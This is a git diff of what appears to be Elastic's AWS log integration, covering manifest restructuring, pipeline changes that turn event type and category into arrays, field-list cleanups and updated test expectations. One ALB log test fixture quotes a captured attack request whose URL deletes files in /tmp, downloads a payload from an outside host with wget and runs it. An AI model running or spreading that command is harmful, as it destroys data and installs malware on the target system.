@@ -55,7 +55,9 @@ "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T16:06:40Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UploadSSHPublicKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"sSHPublicKeyBody\":\"ssh-rsa AAAAdeadcodedeadcode Alice@localhost.domain\",\"userName\":\"Alice\"},\"responseElements\":{\"sSHPublicKey\":{\"fingerprint\":\"de:ad:c0:de:de:ad:c0:de:de:ad:c0:de:de:ad:c0:de\",\"status\":\"Active\",\"uploadDate\":\"Jan 10, 2020 4:06:40 PM\",\"userName\":\"Alice\",\"sSHPublicKeyId\":\"EXAMPLE_KEY_ID\",\"sSHPublicKeyBody\":\"ssh-rsa AAAAdeadcodedeadcode Alice@localhost.domain\"}},\"requestID\":\"EXAMPLE-44b9-41cd-90f2-EXAMPLE\",\"eventID\":\"EXAMPLE-9a9d-4da4-9998-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "outcome": "success", "provider": "iam.amazonaws.com", - "type": "info" + "type": [ + "info" + ] }, "related": { "user": [ diff --git a/packages/aws/data_stream/cloudtrail/elasticsearch/ingest_pipeline/default.yml b/packages/aws/data_stream/cloudtrail/elasticsearch/ingest_pipeline/default.yml index 1736d2ff8288..a872a6e6f70a 100644 --- a/packages/aws/data_stream/cloudtrail/elasticsearch/ingest_pipeline/default.yml +++ b/packages/aws/data_stream/cloudtrail/elasticsearch/ingest_pipeline/default.yml @@ -612,7 +612,7 @@ processors: - change source: >- ctx.event.kind = 'event'; - ctx.event.type = 'info'; + ctx.event.type = ['info']; if (ctx?.aws?.cloudtrail?.error_code != null || ctx?.aws?.cloudtrail?.error_message != null) { ctx.event.outcome = 'failure' diff --git a/packages/aws/data_stream/cloudwatch_logs/manifest.yml b/packages/aws/data_stream/cloudwatch_logs/manifest.yml index 80391fbb4d96..86ff3e889bd9 100644 --- a/packages/aws/data_stream/cloudwatch_logs/manifest.yml +++ b/packages/aws/data_stream/cloudwatch_logs/manifest.yml @@ -128,6 +128,8 @@ streams: title: Dataset name description: > Set the name for your dataset. Changing the dataset will send the data to a different index. You can't use `-` in the name of a dataset and only valid characters for [Elasticsearch index names](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-index_.html). + # Ensures agents have permissions to write data to `logs-*-*` -elasticsearch.dynamic_dataset: true -elasticsearch.dynamic_namespace: true +elasticsearch: + dynamic_dataset: true + dynamic_namespace: true diff --git a/packages/aws/data_stream/dynamodb/fields/ecs.yml b/packages/aws/data_stream/dynamodb/fields/ecs.yml index 0d63728409a0..8e6c369edfc8 100644 --- a/packages/aws/data_stream/dynamodb/fields/ecs.yml +++ b/packages/aws/data_stream/dynamodb/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.name - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/ebs/fields/ecs.yml b/packages/aws/data_stream/ebs/fields/ecs.yml index 0d63728409a0..8e6c369edfc8 100644 --- a/packages/aws/data_stream/ebs/fields/ecs.yml +++ b/packages/aws/data_stream/ebs/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.name - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/ec2_logs/manifest.yml b/packages/aws/data_stream/ec2_logs/manifest.yml index a47435b294f2..df69ef4bcc38 100644 --- a/packages/aws/data_stream/ec2_logs/manifest.yml +++ b/packages/aws/data_stream/ec2_logs/manifest.yml @@ -188,5 +188,6 @@ streams: multi: false default: false # Ensures agents have permissions to write data to `logs-*-*` -elasticsearch.dynamic_dataset: true -elasticsearch.dynamic_namespace: true +elasticsearch: + dynamic_dataset: true + dynamic_namespace: true diff --git a/packages/aws/data_stream/ecs_metrics/fields/ecs.yml b/packages/aws/data_stream/ecs_metrics/fields/ecs.yml index 0d63728409a0..8e6c369edfc8 100644 --- a/packages/aws/data_stream/ecs_metrics/fields/ecs.yml +++ b/packages/aws/data_stream/ecs_metrics/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.name - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json b/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json index a993693e9388..c10d956ddb02 100644 --- a/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json +++ b/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json @@ -49,7 +49,9 @@ "version": "8.2.0" }, "event": { - "category": "web", + "category": [ + "web" + ], "end": "2018-07-02T22:23:00.186Z", "kind": "event", "original": "http 2018-07-02T22:23:00.186641Z app/my-loadbalancer/50dc6c495c0c9188 192.168.131.39:2817 10.0.0.1:80 0.000 0.001 0.000 200 200 34 366 \"GET http://www.example.com:80/ HTTP/1.1\" \"curl/7.46.0\" - - arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067 \"Root=1-58337262-36d228ad5d99923122bbe354\" \"-\" \"-\" 0 2018-07-02T22:22:48.364000Z \"forward,redirect\" \"-\" \"-\" \"10.0.0.1:80\" \"200\" \"-\" \"-\"", @@ -125,7 +127,9 @@ "version": "8.2.0" }, "event": { - "category": "web", + "category": [ + "web" + ], "end": "2022-05-12T06:41:29.051Z", "kind": "event", "original": "http 2022-05-12T06:41:29.051646Z app/admin-LoadB-1EGHQRJIOLMFR/3011821a43ee0c5e 67.43.156.20:41542 - -1 -1 -1 301 - 233 390 \"GET http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws HTTP/1.1\" \"Hello, world\" - - - \"Root=1-627cac19-4c6df30820daa80e3fd72ced\" \"-\" \"-\" 0 2022-05-12T06:41:29.051000Z \"redirect\" \"https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws\" \"-\" \"-\" \"-\" \"Acceptable\" \"SpaceInUri\"", diff --git a/packages/aws/data_stream/elb_logs/elasticsearch/ingest_pipeline/default.yml b/packages/aws/data_stream/elb_logs/elasticsearch/ingest_pipeline/default.yml index 2d01b17540a3..f60949ae61f1 100644 --- a/packages/aws/data_stream/elb_logs/elasticsearch/ingest_pipeline/default.yml +++ b/packages/aws/data_stream/elb_logs/elasticsearch/ingest_pipeline/default.yml @@ -127,14 +127,14 @@ processors: - set: if: ctx.http != null field: event.category - value: web + value: [web] - set: field: aws.elb.protocol value: tcp if: ctx.http == null - set: field: event.category - value: network + value: [network] if: ctx.http == null - set: field: event.outcome diff --git a/packages/aws/data_stream/elb_logs/sample_event.json b/packages/aws/data_stream/elb_logs/sample_event.json index 2272aefa3509..61635a82e51f 100644 --- a/packages/aws/data_stream/elb_logs/sample_event.json +++ b/packages/aws/data_stream/elb_logs/sample_event.json @@ -47,7 +47,9 @@ "version": "8.0.0" }, "event": { - "category": "web", + "category": [ + "web" + ], "end": "2018-07-02T22:23:00.186Z", "kind": "event", "original": "http 2018-07-02T22:23:00.186641Z app/my-loadbalancer/50dc6c495c0c9188 192.168.131.39:2817 10.0.0.1:80 0.000 0.001 0.000 200 200 34 366 \"GET http://www.example.com:80/ HTTP/1.1\" \"curl/7.46.0\" - - arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067 \"Root=1-58337262-36d228ad5d99923122bbe354\" \"-\" \"-\" 0 2018-07-02T22:22:48.364000Z \"forward,redirect\" \"-\" \"-\" \"10.0.0.1:80\" \"200\" \"-\" \"-\"", diff --git a/packages/aws/data_stream/elb_metrics/fields/ecs.yml b/packages/aws/data_stream/elb_metrics/fields/ecs.yml index 0d63728409a0..8e6c369edfc8 100644 --- a/packages/aws/data_stream/elb_metrics/fields/ecs.yml +++ b/packages/aws/data_stream/elb_metrics/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.name - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/emr_logs/_dev/test/pipeline/test-common-config.yml b/packages/aws/data_stream/emr_logs/_dev/test/pipeline/test-common-config.yml index 7780f71c7be2..0bdc8458a752 100644 --- a/packages/aws/data_stream/emr_logs/_dev/test/pipeline/test-common-config.yml +++ b/packages/aws/data_stream/emr_logs/_dev/test/pipeline/test-common-config.yml @@ -4,4 +4,4 @@ fields: multiline: first_line_pattern: '^[0-9]' negate: true - match: after \ No newline at end of file + match: after diff --git a/packages/aws/data_stream/emr_logs/_dev/test/pipeline/test-emr-hadoop.log-expected.json b/packages/aws/data_stream/emr_logs/_dev/test/pipeline/test-emr-hadoop.log-expected.json index 25994a1ff2fb..62e5737f5abb 100644 --- a/packages/aws/data_stream/emr_logs/_dev/test/pipeline/test-emr-hadoop.log-expected.json +++ b/packages/aws/data_stream/emr_logs/_dev/test/pipeline/test-emr-hadoop.log-expected.json @@ -1413,12 +1413,12 @@ "version": "8.0.0" }, "event": { - "original": "2023-06-26 13:45:51,244 INFO namenode.NNStorageRetentionManager: Going to retain 1 images with txid \u003e= 0" + "original": "2023-06-26 13:45:51,244 INFO namenode.NNStorageRetentionManager: Going to retain 1 images with txid >= 0" }, "log": { "level": "INFO" }, - "message": "Going to retain 1 images with txid \u003e= 0", + "message": "Going to retain 1 images with txid >= 0", "process": { "name": "namenode.NNStorageRetentionManager" }, diff --git a/packages/aws/data_stream/emr_logs/fields/ecs.yml b/packages/aws/data_stream/emr_logs/fields/ecs.yml index 249a3bb663a9..86819abe4f7d 100644 --- a/packages/aws/data_stream/emr_logs/fields/ecs.yml +++ b/packages/aws/data_stream/emr_logs/fields/ecs.yml @@ -57,4 +57,4 @@ - external: ecs name: container.name - external: ecs - name: log.level \ No newline at end of file + name: log.level diff --git a/packages/aws/data_stream/emr_logs/fields/fields.yml b/packages/aws/data_stream/emr_logs/fields/fields.yml index d25df0d5191e..9c2b3e5d5584 100644 --- a/packages/aws/data_stream/emr_logs/fields/fields.yml +++ b/packages/aws/data_stream/emr_logs/fields/fields.yml @@ -25,4 +25,4 @@ description: Process entrypoint. - name: process.message type: keyword - description: Process message. \ No newline at end of file + description: Process message. diff --git a/packages/aws/data_stream/emr_logs/manifest.yml b/packages/aws/data_stream/emr_logs/manifest.yml index 68dade863ccf..27e72b798594 100644 --- a/packages/aws/data_stream/emr_logs/manifest.yml +++ b/packages/aws/data_stream/emr_logs/manifest.yml @@ -228,5 +228,6 @@ streams: multi: false default: false # Ensures agents have permissions to write data to `logs-*-*` -elasticsearch.dynamic_dataset: true -elasticsearch.dynamic_namespace: true +elasticsearch: + dynamic_dataset: true + dynamic_namespace: true diff --git a/packages/aws/data_stream/emr_metrics/fields/fields.yml b/packages/aws/data_stream/emr_metrics/fields/fields.yml index da72d8b1215e..3724f65f84ea 100644 --- a/packages/aws/data_stream/emr_metrics/fields/fields.yml +++ b/packages/aws/data_stream/emr_metrics/fields/fields.yml @@ -1,6 +1,5 @@ - name: aws type: group - release: beta fields: - name: elasticmapreduce type: group @@ -272,4 +271,4 @@ - name: JobFlowId type: keyword dimension: true - description: Filters metrics by cluster ID. \ No newline at end of file + description: Filters metrics by cluster ID. diff --git a/packages/aws/data_stream/kinesis/fields/ecs.yml b/packages/aws/data_stream/kinesis/fields/ecs.yml index ffdd5f1facd4..40dfe1a68c99 100644 --- a/packages/aws/data_stream/kinesis/fields/ecs.yml +++ b/packages/aws/data_stream/kinesis/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.id - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/lambda/fields/ecs.yml b/packages/aws/data_stream/lambda/fields/ecs.yml index 0d63728409a0..8e6c369edfc8 100644 --- a/packages/aws/data_stream/lambda/fields/ecs.yml +++ b/packages/aws/data_stream/lambda/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.name - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/natgateway/fields/ecs.yml b/packages/aws/data_stream/natgateway/fields/ecs.yml index 0d63728409a0..8e6c369edfc8 100644 --- a/packages/aws/data_stream/natgateway/fields/ecs.yml +++ b/packages/aws/data_stream/natgateway/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.name - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/redshift/fields/ecs.yml b/packages/aws/data_stream/redshift/fields/ecs.yml index e3079b34bb99..73c5642cde2f 100644 --- a/packages/aws/data_stream/redshift/fields/ecs.yml +++ b/packages/aws/data_stream/redshift/fields/ecs.yml @@ -52,4 +52,4 @@ name: host.type - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/route53_public_logs/fields/ecs.yml b/packages/aws/data_stream/route53_public_logs/fields/ecs.yml index bee83dc96b75..b78d8a3503f7 100644 --- a/packages/aws/data_stream/route53_public_logs/fields/ecs.yml +++ b/packages/aws/data_stream/route53_public_logs/fields/ecs.yml @@ -30,36 +30,14 @@ name: related.ip - external: ecs name: related.hosts -- external: ecs - name: source.address -- external: ecs - name: source.ip -- external: ecs - name: source.as.number -- external: ecs - name: source.as.organization.name -- name: source.geo.city_name - external: ecs - name: source.geo.continent_name external: ecs - name: source.geo.country_iso_code external: ecs -- name: source.geo.country_name - external: ecs -- name: source.geo.location - external: ecs -- name: source.geo.region_iso_code - external: ecs -- name: source.geo.region_name - external: ecs - external: ecs name: cloud.account.id - external: ecs name: cloud.region -- external: ecs - name: ecs.version -- external: ecs - name: error.message - external: ecs name: source.address - external: ecs @@ -68,10 +46,6 @@ name: source.as.organization.name - external: ecs name: source.geo.city_name -- external: ecs - name: source.geo.continent_name -- external: ecs - name: source.geo.country_iso_code - external: ecs name: source.geo.country_name - description: Longitude and latitude. @@ -84,8 +58,6 @@ name: source.geo.region_name - external: ecs name: source.ip -- external: ecs - name: tags - external: ecs name: host.architecture - external: ecs diff --git a/packages/aws/data_stream/route53_resolver_logs/fields/ecs.yml b/packages/aws/data_stream/route53_resolver_logs/fields/ecs.yml index 3b9d9e07b22c..25dcf94c7d0a 100644 --- a/packages/aws/data_stream/route53_resolver_logs/fields/ecs.yml +++ b/packages/aws/data_stream/route53_resolver_logs/fields/ecs.yml @@ -36,24 +36,12 @@ name: related.hosts - external: ecs name: source.port -- external: ecs - name: source.address - external: ecs name: source.ip -- external: ecs - name: source.as.number - external: ecs name: source.as.organization.name -- name: source.geo.city_name - external: ecs -- name: source.geo.continent_name - external: ecs - name: source.geo.country_iso_code external: ecs -- name: source.geo.country_name - external: ecs -- name: source.geo.location - external: ecs - name: source.geo.region_iso_code external: ecs - name: source.geo.region_name @@ -62,36 +50,20 @@ name: cloud.account.id - external: ecs name: cloud.region -- external: ecs - name: ecs.version -- external: ecs - name: error.message - external: ecs name: source.address - external: ecs name: source.as.number -- external: ecs - name: source.as.organization.name - external: ecs name: source.geo.city_name - external: ecs name: source.geo.continent_name -- external: ecs - name: source.geo.country_iso_code - external: ecs name: source.geo.country_name - description: Longitude and latitude. level: core name: source.geo.location type: geo_point -- external: ecs - name: source.geo.region_iso_code -- external: ecs - name: source.geo.region_name -- external: ecs - name: source.ip -- external: ecs - name: tags - external: ecs name: host.architecture - external: ecs diff --git a/packages/aws/data_stream/route53_resolver_logs/sample_event.json b/packages/aws/data_stream/route53_resolver_logs/sample_event.json index 77e86321a091..c949cf58cde4 100644 --- a/packages/aws/data_stream/route53_resolver_logs/sample_event.json +++ b/packages/aws/data_stream/route53_resolver_logs/sample_event.json @@ -40,7 +40,7 @@ "data_stream": { "namespace": "default", "type": "logs", - "dataset": "aws.route53_public_logs" + "dataset": "aws.route53_resolver_logs" }, "dns": { "question": { diff --git a/packages/aws/data_stream/s3_storage_lens/fields/fields.yml b/packages/aws/data_stream/s3_storage_lens/fields/fields.yml index 67a494b46f28..616e006accd1 100644 --- a/packages/aws/data_stream/s3_storage_lens/fields/fields.yml +++ b/packages/aws/data_stream/s3_storage_lens/fields/fields.yml @@ -1,6 +1,5 @@ - name: aws type: group - release: experimental fields: - name: s3_storage_lens type: group diff --git a/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json b/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json index 924ec1df42ad..34ddf79d268a 100644 --- a/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json +++ b/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json @@ -15,7 +15,7 @@ "operation": "REST.GET.LOCATION", "remote_ip": "89.160.20.156", "request_id": "44EE8651683CB4DA", - "request_uri": "GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1", + "request_uri": "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1", "requester": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9", "signature_version": "SigV4", "tls_version": "TLSv1.2", @@ -25,6 +25,18 @@ }, "client": { "address": "89.160.20.156", + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, "ip": "89.160.20.156", "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" @@ -43,7 +55,7 @@ "duration": 17000000, "id": "44EE8651683CB4DA", "kind": "event", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:41 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 44EE8651683CB4DA REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 17 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:41 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 44EE8651683CB4DA REST.GET.LOCATION - \"GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1\" 200 - 142 - 17 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "outcome": "success", "type": [ "access" @@ -90,9 +102,9 @@ "version_protocol": "tls" }, "url": { - "original": "/test-s3-ks/?location\u0026aws-account=627959692251", + "original": "/test-s3-ks/?location&aws-account=627959692251", "path": "/test-s3-ks/", - "query": "location\u0026aws-account=627959692251" + "query": "location&aws-account=627959692251" }, "user_agent": { "device": { @@ -123,7 +135,7 @@ "operation": "REST.GET.LOCATION", "remote_ip": "89.160.20.156", "request_id": "E26222010BCC32B6", - "request_uri": "GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1", + "request_uri": "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1", "requester": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9", "signature_version": "SigV4", "tls_version": "TLSv1.2", @@ -133,6 +145,18 @@ }, "client": { "address": "89.160.20.156", + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, "ip": "89.160.20.156", "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" @@ -151,7 +175,7 @@ "duration": 3000000, "id": "E26222010BCC32B6", "kind": "event", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 3 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - \"GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1\" 200 - 142 - 3 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "outcome": "success", "type": [ "access" @@ -198,9 +222,9 @@ "version_protocol": "tls" }, "url": { - "original": "/test-s3-ks/?location\u0026aws-account=627959692251", + "original": "/test-s3-ks/?location&aws-account=627959692251", "path": "/test-s3-ks/", - "query": "location\u0026aws-account=627959692251" + "query": "location&aws-account=627959692251" }, "user_agent": { "device": { @@ -231,7 +255,7 @@ "operation": "REST.GET.BUCKET", "remote_ip": "89.160.20.156", "request_id": "4DD6D17D1C5C401C", - "request_uri": "GET /test-s3-ks/?max-keys=0\u0026encoding-type=url\u0026aws-account=627959692251 HTTP/1.1", + "request_uri": "GET /test-s3-ks/?max-keys=0&encoding-type=url&aws-account=627959692251 HTTP/1.1", "requester": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9", "signature_version": "SigV4", "tls_version": "TLSv1.2", @@ -242,6 +266,18 @@ }, "client": { "address": "89.160.20.156", + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, "ip": "89.160.20.156", "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" @@ -260,7 +296,7 @@ "duration": 2000000, "id": "4DD6D17D1C5C401C", "kind": "event", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - \"GET /test-s3-ks/?max-keys=0\u0026encoding-type=url\u0026aws-account=627959692251 HTTP/1.1\" 200 - 265 - 2 1 \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - \"GET /test-s3-ks/?max-keys=0&encoding-type=url&aws-account=627959692251 HTTP/1.1\" 200 - 265 - 2 1 \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "outcome": "success", "type": [ "access" @@ -307,9 +343,9 @@ "version_protocol": "tls" }, "url": { - "original": "/test-s3-ks/?max-keys=0\u0026encoding-type=url\u0026aws-account=627959692251", + "original": "/test-s3-ks/?max-keys=0&encoding-type=url&aws-account=627959692251", "path": "/test-s3-ks/", - "query": "max-keys=0\u0026encoding-type=url\u0026aws-account=627959692251" + "query": "max-keys=0&encoding-type=url&aws-account=627959692251" }, "user_agent": { "device": { @@ -340,7 +376,7 @@ "operation": "REST.GET.LOCATION", "remote_ip": "89.160.20.156", "request_id": "706992E2F3CC3C3D", - "request_uri": "GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1", + "request_uri": "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1", "requester": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9", "signature_version": "SigV4", "tls_version": "TLSv1.2", @@ -350,6 +386,18 @@ }, "client": { "address": "89.160.20.156", + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, "ip": "89.160.20.156", "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" @@ -368,7 +416,7 @@ "duration": 4000000, "id": "706992E2F3CC3C3D", "kind": "event", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 4 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - 